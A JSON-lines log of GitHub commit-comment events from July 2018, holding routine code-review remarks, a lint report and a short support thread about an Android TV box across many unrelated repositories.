{"id":"8038302887","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"rmsivakanth/LISAv2"},"payload":{"comment":{"id":29888365,"position":89,"line":160,"path":"Testscripts/Linux/perf_ntttcp.sh","commit_id":"b2920e8a8a6a774dc67e7b0382bc638447e4cb72","created_at":"2018-07-30T15:02:44Z","updated_at":"2018-07-30T15:02:44Z","author_association":"NONE","body":"instead it, do change $testType to upper case, and then compare in the single condition."}},"created_at":"2018-07-30T15:02:44Z"}
{"id":"8038304527","type":"CommitCommentEvent","actor":{"login":"pplu"},"repo":{"name":"pplu/botocore"},"payload":{"comment":{"id":29888372,"position":null,"line":null,"path":null,"commit_id":"93d62cf5cf6c848bb1a1262c198202152f766b9a","created_at":"2018-07-30T15:03:00Z","updated_at":"2018-07-30T15:03:00Z","author_association":"OWNER","body":"OK. My bad. I changed it from Filter to Prefix to get the generators working again. IIRC the Filter attribute wasn't defined, so the generator was blowing up.\r\n\r\nMaybe you want to take a look at the latest botocore s3 definition and compare it with this one."}},"created_at":"2018-07-30T15:03:00Z"}
{"id":"8038305198","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888374,"position":27,"line":27,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-30T15:03:07Z","updated_at":"2018-07-30T15:03:07Z","author_association":"OWNER","body":"jQueryオブジェクトのoffsetメソッドです"}},"created_at":"2018-07-30T15:03:07Z"}
{"id":"8038310640","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888390,"position":19,"line":19,"path":"020/2001.html","commit_id":"9e2f4c50d5ca43c4c95e54b9710f7725802e3ead","created_at":"2018-07-30T15:03:56Z","updated_at":"2018-07-30T15:03:56Z","author_association":"OWNER","body":"jQueryオブジェクトのhtmlメソッドです"}},"created_at":"2018-07-30T15:03:56Z"}
{"id":"8038317446","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888408,"position":5,"line":246,"path":"source/js/toolbar.js","commit_id":"f55112db126c716bfc2f4c31d8c91272cf0e3402","created_at":"2018-07-30T15:04:59Z","updated_at":"2018-07-30T15:04:59Z","author_association":"MEMBER","body":"Shouldn't you fix that instead of just ignoring it?"}},"created_at":"2018-07-30T15:04:59Z"}
{"id":"8038322284","type":"CommitCommentEvent","actor":{"login":"Plonee"},"repo":{"name":"green-fox-academy/Andras89"},"payload":{"comment":{"id":29888416,"position":7,"line":52,"path":"Python/Wanderer/game_loader.py","commit_id":"78a1268ed4b46df6713d99942d4221f2d2222d89","created_at":"2018-07-30T15:05:45Z","updated_at":"2018-07-30T15:05:45Z","author_association":"NONE","body":"Git gud"}},"created_at":"2018-07-30T15:05:45Z"}
{"id":"8038326301","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888431,"position":22,"line":46,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T15:06:21Z","updated_at":"2018-07-30T15:06:21Z","author_association":"MEMBER","body":":( copypasta"}},"created_at":"2018-07-30T15:06:21Z"}
{"id":"8038326637","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888432,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:06:24Z","updated_at":"2018-07-30T15:06:24Z","author_association":"OWNER","body":"你的是什么设备？"}},"created_at":"2018-07-30T15:06:24Z"}
{"id":"8038328266","type":"CommitCommentEvent","actor":{"login":"paulfurley"},"repo":{"name":"lightningbank/lightning-daemon"},"payload":{"comment":{"id":29888435,"position":null,"line":null,"path":null,"commit_id":"5fd236c870fded2bb03d4f70596053dcdeba2a78","created_at":"2018-07-30T15:06:39Z","updated_at":"2018-07-30T15:06:39Z","author_association":"NONE","body":"@hackerrdave Is this still true? I've read conflicting information about whether the @Roasbeef fork is required... Thanks!"}},"created_at":"2018-07-30T15:06:39Z"}
{"id":"8038334805","type":"CommitCommentEvent","actor":{"login":"castaway"},"repo":{"name":"pplu/botocore"},"payload":{"comment":{"id":29888448,"position":null,"line":null,"path":null,"commit_id":"93d62cf5cf6c848bb1a1262c198202152f766b9a","created_at":"2018-07-30T15:07:40Z","updated_at":"2018-07-30T15:07:40Z","author_association":"NONE","body":"Hmm odd, it was working fine in the previous checkout of develop, I will look at the new one (could be I'm wrong..)"}},"created_at":"2018-07-30T15:07:40Z"}
{"id":"8038334880","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29888449,"position":5,"line":124,"path":"app-office/libreoffice/libreoffice-6.2.0.0~git.recipe","commit_id":"39c820d5423a46fb8d0fb0bbc2615cb4c158bcfe","created_at":"2018-07-30T15:07:41Z","updated_at":"2018-07-30T15:07:41Z","author_association":"CONTRIBUTOR","body":"Sorry for the noice, is this really required here? (there is nothing providing any lib with any *proto headers)"}},"created_at":"2018-07-30T15:07:41Z"}
{"id":"8038335820","type":"CommitCommentEvent","actor":{"login":"sarthakmalla"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_helium"},"payload":{"comment":{"id":29888451,"position":5,"line":32,"path":"overlay-lineage/frameworks/base/core/res/res/values/config.xml","commit_id":"281c86b70ed90cef6b325bca6828e98819a46c6b","created_at":"2018-07-30T15:07:49Z","updated_at":"2018-07-30T15:07:49Z","author_association":"CONTRIBUTOR","body":"nah "}},"created_at":"2018-07-30T15:07:49Z"}
{"id":"8038336849","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"inkyblackness/hacked"},"payload":{"comment":{"id":29888456,"position":22,"line":22,"path":"ui/gui/StepSliderInt.go","commit_id":"b41174b9fec00f0f59480eccdbdd1cba05dc337d","created_at":"2018-07-30T15:07:59Z","updated_at":"2018-07-30T15:07:59Z","author_association":"NONE","body":"As a minor suggestion: I noticed in the screenshot that this spacing had lots of spacing between the +/- buttons and the slider. You may use `SameLine(0.0f, style.InnerStyleSpacing.x)` to use the \"smaller\" spacing means for objects that are grouped together. "}},"created_at":"2018-07-30T15:07:59Z"}
{"id":"8038337016","type":"CommitCommentEvent","actor":{"login":"vels527"},"repo":{"name":"vels527/AirPlus"},"payload":{"comment":{"id":29888458,"position":10,"line":29,"path":"src/private/AirbnbGuestList/AirbnbGuestList/Program.cs","commit_id":"951fdb32ec6f3f44c577e6178f40bf72bdce7353","created_at":"2018-07-30T15:08:01Z","updated_at":"2018-07-30T15:08:01Z","author_association":"OWNER","body":"Use camel casing instead of _"}},"created_at":"2018-07-30T15:08:01Z"}
{"id":"8038339108","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29888461,"position":22,"line":23,"path":"product/qcom-radio.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T15:08:21Z","updated_at":"2018-07-30T15:08:21Z","author_association":"NONE","body":"Real pro stuff v1"}},"created_at":"2018-07-30T15:08:21Z"}
{"id":"8038339567","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29888462,"position":31,"line":35,"path":"product/qcom-radio.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T15:08:25Z","updated_at":"2018-07-30T15:08:25Z","author_association":"NONE","body":"V2"}},"created_at":"2018-07-30T15:08:25Z"}
{"id":"8038340488","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29888466,"position":4,"line":3,"path":"product/display.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T15:08:34Z","updated_at":"2018-07-30T15:08:34Z","author_association":"NONE","body":"v3"}},"created_at":"2018-07-30T15:08:34Z"}
{"id":"8038340512","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29888467,"position":null,"line":null,"path":null,"commit_id":"c1eca12ff8084bb22013f9fd5edca808f444328d","created_at":"2018-07-30T15:08:34Z","updated_at":"2018-07-30T15:08:34Z","author_association":"CONTRIBUTOR","body":"Removed ez. Added FFF."}},"created_at":"2018-07-30T15:08:34Z"}
{"id":"8038342580","type":"CommitCommentEvent","actor":{"login":"Gustry"},"repo":{"name":"3liz/QgisLayerBoardPlugin"},"payload":{"comment":{"id":29888473,"position":5,"line":739,"path":"layer_board.py","commit_id":"67ce985146ec38d9c0e751deef8c2829e4943c06","created_at":"2018-07-30T15:08:53Z","updated_at":"2018-07-30T15:08:53Z","author_association":"CONTRIBUTOR","body":"AFAIK, yes it's working now for QGIS 2.18.20, so not for all QGIS 2 versions"}},"created_at":"2018-07-30T15:08:53Z"}
{"id":"8038343983","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29888480,"position":14,"line":194,"path":"app-office/libreoffice/libreoffice-6.2.0.0~git.recipe","commit_id":"39c820d5423a46fb8d0fb0bbc2615cb4c158bcfe","created_at":"2018-07-30T15:09:07Z","updated_at":"2018-07-30T15:09:07Z","author_association":"CONTRIBUTOR","body":"You could still use devel:xproto (as provided by xorgproto), they can't co-exist so it shouldn't break anything (but best to check) :)"}},"created_at":"2018-07-30T15:09:07Z"}
{"id":"8038344502","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888483,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:09:11Z","updated_at":"2018-07-30T15:09:11Z","author_association":"NONE","body":"MXQ Pro，还有用Nox Player试过也是一样的问题"}},"created_at":"2018-07-30T15:09:11Z"}
{"id":"8038345294","type":"CommitCommentEvent","actor":{"login":"disaderp"},"repo":{"name":"disaderp/automatic-chainsaw"},"payload":{"comment":{"id":29888486,"position":null,"line":null,"path":null,"commit_id":"90ef847f139c54d6413da41e6c1ad473e2a8383a","created_at":"2018-07-30T15:09:19Z","updated_at":"2018-07-30T15:09:19Z","author_association":"OWNER","body":"#31"}},"created_at":"2018-07-30T15:09:19Z"}
{"id":"8038348636","type":"CommitCommentEvent","actor":{"login":"dakkad"},"repo":{"name":"ampproject/amp-toolbox"},"payload":{"comment":{"id":29888495,"position":4,"line":19,"path":"optimizer/lib/transformers/PruneDuplicateResourceHints.js","commit_id":"be062b766d08e1465b22c00fb0b6e64343b7984b","created_at":"2018-07-30T15:09:48Z","updated_at":"2018-07-30T15:09:48Z","author_association":"NONE","body":"Done."}},"created_at":"2018-07-30T15:09:48Z"}
{"id":"8038354112","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888505,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:10:39Z","updated_at":"2018-07-30T15:10:39Z","author_association":"OWNER","body":"就是那种外贸盒子吗？"}},"created_at":"2018-07-30T15:10:39Z"}
{"id":"8038358539","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888515,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:11:21Z","updated_at":"2018-07-30T15:11:21Z","author_association":"NONE","body":"是的"}},"created_at":"2018-07-30T15:11:21Z"}
{"id":"8038363843","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888530,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:12:11Z","updated_at":"2018-07-30T15:12:11Z","author_association":"OWNER","body":"安装这个APP\r\nhttps://play.google.com/store/apps/details?id=com.jrummy.apps.build.prop.editor&hl=en"}},"created_at":"2018-07-30T15:12:11Z"}
{"id":"8038367345","type":"CommitCommentEvent","actor":{"login":"vels527"},"repo":{"name":"vels527/AirPlus"},"payload":{"comment":{"id":29888617,"position":56,"line":63,"path":"src/private/AirbnbGuestList/AirbnbGuestList/Program.cs","commit_id":"951fdb32ec6f3f44c577e6178f40bf72bdce7353","created_at":"2018-07-30T15:12:42Z","updated_at":"2018-07-30T15:12:42Z","author_association":"OWNER","body":"Have all DB related functions as a separate layer."}},"created_at":"2018-07-30T15:12:42Z"}
{"id":"8038367846","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888635,"position":22,"line":46,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T15:12:46Z","updated_at":"2018-07-30T15:12:46Z","author_association":"NONE","body":"i meant more that I had been looking at `document.createElement` from their site and they use all uppercase, so that's what I thought was the right syntax"}},"created_at":"2018-07-30T15:12:46Z"}
{"id":"8038370091","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29888667,"position":206,"line":159,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T15:13:08Z","updated_at":"2018-07-30T15:13:08Z","author_association":"NONE","body":"Why not `closeGame` right away as the second player reveals? "}},"created_at":"2018-07-30T15:13:08Z"}
{"id":"8038370634","type":"CommitCommentEvent","actor":{"login":"arunassain"},"repo":{"name":"arunassain/android_kernel_lenovo_karate"},"payload":{"comment":{"id":29888668,"position":null,"line":null,"path":null,"commit_id":"02311a454155e7c2c7b727a464ecdfc0f1399610","created_at":"2018-07-30T15:13:12Z","updated_at":"2018-07-30T15:13:12Z","author_association":"OWNER","body":"Sumu 🤗\n\nOn Mon 30 Jul, 2018, 8:21 PM Harshit Jain, <notifications@github.com> wrote:\n\n> While your dad was away on border for fighting wars for 4 years and you\n> were born!! This was what exactly your mama said on call when he asked\n> whether I got a boy or girl.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arunassain/android_kernel_lenovo_karate/commit/02311a454155e7c2c7b727a464ecdfc0f1399610#commitcomment-29888188>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AYuzS5-5rYZXRscLUYmnVgNOZ7Y4Q-NAks5uLx2EgaJpZM4Vmjzl>\n> .\n>\n"}},"created_at":"2018-07-30T15:13:12Z"}
{"id":"8038374089","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888680,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:13:44Z","updated_at":"2018-07-30T15:13:44Z","author_association":"OWNER","body":"然后找到这样一行\r\nro.product.cpu.abi2=\r\n看看等号后面是什么？"}},"created_at":"2018-07-30T15:13:44Z"}
{"id":"8038374297","type":"CommitCommentEvent","actor":{"login":"arunassain"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29888681,"position":4,"line":3,"path":"product/display.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T15:13:45Z","updated_at":"2018-07-30T15:13:45Z","author_association":"OWNER","body":"Again Sumu🤗\n\nOn Mon 30 Jul, 2018, 8:38 PM Isaac Chen, <notifications@github.com> wrote:\n\n> v3\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arunassain/android_device_lenovo_karate/commit/d989a0ec68ab85b5ec9cbb0113df3492600644a9#commitcomment-29888466>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AYuzS8NMhE4RB5yGlHb3sUSfPF_FkomZks5uLyFygaJpZM4Vmh7R>\n> .\n>\n"}},"created_at":"2018-07-30T15:13:45Z"}
{"id":"8038374334","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29888683,"position":97,"line":546,"path":"src/local.c","commit_id":"9a561555136c1aea448bf59735042e686e8381c0","created_at":"2018-07-30T15:13:46Z","updated_at":"2018-07-30T15:13:46Z","author_association":"NONE","body":"@madeye I think you're drunk. :sweat: Now `storage` can be uninitialized."}},"created_at":"2018-07-30T15:13:46Z"}
{"id":"8038377022","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29888688,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:14:11Z","updated_at":"2018-07-30T15:14:11Z","author_association":"OWNER","body":"具体讨论看这里\r\nhttps://github.com/yanggis/ChinaTunnel/issues/103"}},"created_at":"2018-07-30T15:14:11Z"}
{"id":"8038378070","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-domain"},"payload":{"comment":{"id":29888689,"position":14,"line":86,"path":"otus-domain/app/project/fieldCenter/center-card/center-card-template.html","commit_id":"0fe29f157719139e9f9a07f811d8a611e08a5831","created_at":"2018-07-30T15:14:20Z","updated_at":"2018-07-30T15:14:20Z","author_association":"MEMBER","body":"A forma como está sendo utilizado o '?' junto a mascara está funcionando corretamente?"}},"created_at":"2018-07-30T15:14:20Z"}
{"id":"8038378309","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29888690,"position":null,"line":null,"path":null,"commit_id":"7d27726e2b056be9abcd81c1b98f27bda40b506c","created_at":"2018-07-30T15:14:23Z","updated_at":"2018-07-30T15:14:23Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/29/violations\n```\nProducts/statusmessages/message.py:88:27: C812 missing trailing comma\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_encoding.py:3:1: I003 isort expected 1 blank line in imports, found 0\nProducts/statusmessages/tests/test_encoding.py:4:1: E302 expected 2 blank lines, found 1\nProducts/statusmessages/tests/test_encoding.py:14:38: C812 missing trailing comma\nProducts/statusmessages/tests/test_encoding.py:32:9: F401 'Products.statusmessages.message.Message' imported but unused\nProducts/statusmessages/tests/test_encoding.py:75:29: E203 whitespace before ','\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T15:14:23Z"}
{"id":"8038382721","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29888703,"position":null,"line":null,"path":null,"commit_id":"4cacb7d8ecd3e072626f3ddaa71c61b6e71b89b6","created_at":"2018-07-30T15:15:03Z","updated_at":"2018-07-30T15:15:03Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-24](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-24).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-24-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-30T15:15:03Z"}
{"id":"8038383796","type":"CommitCommentEvent","actor":{"login":"vels527"},"repo":{"name":"vels527/AirPlus"},"payload":{"comment":{"id":29888705,"position":12,"line":31,"path":"src/private/AirbnbGuestList/AirbnbGuestList/Program.cs","commit_id":"951fdb32ec6f3f44c577e6178f40bf72bdce7353","created_at":"2018-07-30T15:15:13Z","updated_at":"2018-07-30T15:15:13Z","author_association":"OWNER","body":"Put this inside Logger class"}},"created_at":"2018-07-30T15:15:13Z"}
{"id":"8038384136","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29888707,"position":9,"line":186,"path":"RockPaperScissors.sol","commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-30T15:15:16Z","updated_at":"2018-07-30T15:15:16Z","author_association":"NONE","body":"As the creator of the game, can I call this function with a gas price high enough so that I front-run the other player's \"join\" transaction?"}},"created_at":"2018-07-30T15:15:16Z"}
{"id":"8038388278","type":"CommitCommentEvent","actor":{"login":"bls1999"},"repo":{"name":"jacob-grahn/platform-racing-2-server"},"payload":{"comment":{"id":29888721,"position":null,"line":null,"path":null,"commit_id":"75d6cebca9b5635e4d1ed858b1f8a73209a9e2fb","created_at":"2018-07-30T15:15:53Z","updated_at":"2018-07-30T15:15:53Z","author_association":"CONTRIBUTOR","body":"I'd use https for the PR2hub link. Other than that, all good!"}},"created_at":"2018-07-30T15:15:53Z"}
{"id":"8038389564","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29888723,"position":null,"line":null,"path":null,"commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-30T15:16:04Z","updated_at":"2018-07-30T15:16:04Z","author_association":"NONE","body":"What about the case where one player fails to reveal? Very likely to happen if the second player to reveal would reveal a losing move."}},"created_at":"2018-07-30T15:16:04Z"}
{"id":"8038390146","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"Yasunari15/MacTeX-Uninstaller"},"payload":{"comment":{"id":29888725,"position":null,"line":null,"path":null,"commit_id":"086682a29303fc3ab3a48ca761abd049e55cd6c9","created_at":"2018-07-30T15:16:10Z","updated_at":"2018-07-30T15:16:10Z","author_association":"OWNER","body":"@munepi \r\n\r\n> さきほど、 bibunsho7-patch/artwork/Build-icns.sh のライセンスを明示的に Public Domain としておきました。\r\n\r\nありがとうございます。LICENCEに厳格な方もいらっしゃるそうで，そろそろ勉強を始めようと思っていた所でした。ICNSの生成も自動化してしまうとは，さすがは「the wizard of shell script」と感嘆いたしました。"}},"created_at":"2018-07-30T15:16:10Z"}
{"id":"8038390307","type":"CommitCommentEvent","actor":{"login":"vels527"},"repo":{"name":"vels527/AirPlus"},"payload":{"comment":{"id":29888726,"position":36,"line":55,"path":"src/private/AirbnbGuestList/AirbnbGuestList/Program.cs","commit_id":"951fdb32ec6f3f44c577e6178f40bf72bdce7353","created_at":"2018-07-30T15:16:11Z","updated_at":"2018-07-30T15:16:11Z","author_association":"OWNER","body":"Remove FileNotFoundException"}},"created_at":"2018-07-30T15:16:11Z"}
{"id":"8038395446","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29888747,"position":23,"line":200,"path":"RockPaperScissors.sol","commit_id":"36f95ec70f2f9af96d6a6c6880a77935edf8d818","created_at":"2018-07-30T15:16:57Z","updated_at":"2018-07-30T15:16:57Z","author_association":"NONE","body":"I am not sure opponent should collect the winnings if the winner is slow to collect them. \r\nIt is like a Splitter where if you are too slow, you lose your deposit?"}},"created_at":"2018-07-30T15:16:57Z"}
{"id":"8038398655","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29888757,"position":181,"line":181,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T15:17:25Z","updated_at":"2018-07-30T15:17:25Z","author_association":"NONE","body":"I don't think we need the `single` argument here. It actually makes it more confusing on line 174 where the list can actually have a single item, yet we're saying it is not.\r\nIn fact i believe `SampleApplicationTests.uppercase()` assertion may actually be wrong because of that. \r\n\r\nCan/Should we just go with `return response(function, result, body == null ? null : body.size() == 1, false);` on line 200? "}},"created_at":"2018-07-30T15:17:25Z"}
{"id":"8038401884","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-domain"},"payload":{"comment":{"id":29888760,"position":26,"line":88,"path":"otus-domain/app/project/fieldCenter/field-center-template.html","commit_id":"0fe29f157719139e9f9a07f811d8a611e08a5831","created_at":"2018-07-30T15:17:55Z","updated_at":"2018-07-30T15:17:55Z","author_association":"MEMBER","body":"A forma como está sendo utilizado o '?' junto a mascara está funcionando corretamente?"}},"created_at":"2018-07-30T15:17:55Z"}
{"id":"8038412008","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29888791,"position":17,"line":17,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T15:19:32Z","updated_at":"2018-07-30T15:19:32Z","author_association":"OWNER","body":"Опять я не понимаю до конца: Так что надо для задания скорости?\r\nНам нужно расчитывать скорость поезда через заданное ускорение и время?\r\nпо формуле скорости:  v = v0 + a*t ?\r\nили просто брать и присваивать скорости новое значение?"}},"created_at":"2018-07-30T15:19:32Z"}
{"id":"8038413110","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29888793,"position":97,"line":546,"path":"src/local.c","commit_id":"9a561555136c1aea448bf59735042e686e8381c0","created_at":"2018-07-30T15:19:42Z","updated_at":"2018-07-30T15:19:42Z","author_association":"NONE","body":"Wait my bad."}},"created_at":"2018-07-30T15:19:42Z"}
{"id":"8038413554","type":"CommitCommentEvent","actor":{"login":"madeye"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29888798,"position":97,"line":546,"path":"src/local.c","commit_id":"9a561555136c1aea448bf59735042e686e8381c0","created_at":"2018-07-30T15:19:45Z","updated_at":"2018-07-30T15:19:45Z","author_association":"NONE","body":"Yeah, I indeed need some sleep now. 😴\n\nOn Mon, Jul 30, 2018, 11:13 PM Mygod <notifications@github.com> wrote:\n\n> @madeye <https://github.com/madeye> I think you're drunk. 😓 Now storage\n> can be uninitialized.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/shadowsocks/shadowsocks-libev/commit/9a561555136c1aea448bf59735042e686e8381c0#commitcomment-29888683>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAmUzS0-vc4WlGfBm2E1JGCPUtpkX7zcks5uLyKsgaJpZM4Vmmd2>\n> .\n>\n"}},"created_at":"2018-07-30T15:19:45Z"}
{"id":"8038418741","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29888810,"position":161,"line":161,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T15:20:35Z","updated_at":"2018-07-30T15:20:35Z","author_association":"NONE","body":"Should all of this `if/else`  be delegated to StringConverter?"}},"created_at":"2018-07-30T15:20:35Z"}
{"id":"8038420997","type":"CommitCommentEvent","actor":{"login":"castaway"},"repo":{"name":"pplu/botocore"},"payload":{"comment":{"id":29888816,"position":null,"line":null,"path":null,"commit_id":"93d62cf5cf6c848bb1a1262c198202152f766b9a","created_at":"2018-07-30T15:20:54Z","updated_at":"2018-07-30T15:20:54Z","author_association":"NONE","body":"... nope, sorry, you're right. Its confusing that there's both PutBucketLifecycle and PutBucketLifecycleConfiguration, that do the same thing. The recent update made the newer/2nd one use BucketLifecycleConfiguration / LifecycleRule, where the old one uses LifecyleConfiguration/Rule ... d'oh!\r\n\r\nbtw the 1st is deprecated, did you see Finn's issue that maybe we should document those better?\r\n"}},"created_at":"2018-07-30T15:20:54Z"}
{"id":"8038421303","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29888818,"position":null,"line":null,"path":null,"commit_id":"5fef3d8b37a7e9fa61fab1afe2a41739d1552cf5","created_at":"2018-07-30T15:20:57Z","updated_at":"2018-07-30T15:20:57Z","author_association":"OWNER","body":"yes, i vote for its removal.\r\nIt's in git now, so anybody can resurrect it easily (or put it in their _unkindness_)."}},"created_at":"2018-07-30T15:20:57Z"}
